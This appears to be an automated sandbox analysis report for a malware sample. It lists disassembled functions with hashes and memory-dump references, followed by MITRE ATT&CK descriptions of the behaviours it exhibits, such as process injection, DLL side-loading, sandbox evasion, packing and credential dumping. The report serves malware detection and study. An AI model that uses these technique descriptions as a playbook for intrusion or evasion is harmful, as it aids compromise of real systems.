Instruction Fuzzy Hash: DA01FC756583608BE3084F55E49073AB7D9FB8A301F18656DC4D257581C374DD029B5B

Function 00B12B60 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cf4f0a3ffdd517cd88d1cb8bf2d1b537bb0ffedb543b5c245145dac50d8884a
Instruction ID: 3c0232596695e82394f19db52ce8e95d4787ecb0a6bc3737c3c9abb8d1d605b5
Opcode Fuzzy Hash: 3cf4f0a3ffdd517cd88d1cb8bf2d1b537bb0ffedb543b5c245145dac50d8884a
Instruction Fuzzy Hash: 8FF0226B79C30A0B9310CEFAACC06ABB3D1D7C6214F084438EA40D3301E8A4E86682A4

Function 00B30BD3 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80b82b59f8ba05a64fdfd93f700199eb9e263a51519cb83a5ea21960928cceb6
Instruction ID: 513d260d60608405df58b6dc6dd40147de13c73f0d0a3cd78e2361bf5e511105
Opcode Fuzzy Hash: 80b82b59f8ba05a64fdfd93f700199eb9e263a51519cb83a5ea21960928cceb6
Instruction Fuzzy Hash: 1BB092A6C8A410869011AA103C024EBB5BA8913345F9424F0E80623602EE16DA5E409F

Function 00B4D818 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba7791b9c6a33765fb47955f544d8e1961c26540f4f4c7fecc08f26488bf22c8
Instruction ID: 8be86064ca40622e48f4e5a14e94514aea89cf03477b57518bb708f549e137c0
Opcode Fuzzy Hash: ba7791b9c6a33765fb47955f544d8e1961c26540f4f4c7fecc08f26488bf22c8
Instruction Fuzzy Hash: E5B09224A6C150C7960CCF24D890AB1B2BBDB8B60AE14B25AD04B63226DFA0E802860C

Function 00B3D00D Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 289COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 00B3D2C2

Strings

0, xrefs: 00B3D25F
!, xrefs: 00B3D2E4

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID: FreeLibrary
String ID: !$0
API String ID: 3664257935-301933775
Opcode ID: 0c6f34ded8db0d92e9a1ee9f895402de5e02ca7c3a81acc77d16872e5d6f71ef
Instruction ID: a4a2c93467381741bb2f02b6237d90ee2c23c894311bca5e0ddceec18ddfafb5
Opcode Fuzzy Hash: 0c6f34ded8db0d92e9a1ee9f895402de5e02ca7c3a81acc77d16872e5d6f71ef
Instruction Fuzzy Hash: 7D817B315083808BC728CB28985136EFFE2DFD6744F2886AED4D6AB381C638C949C756

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

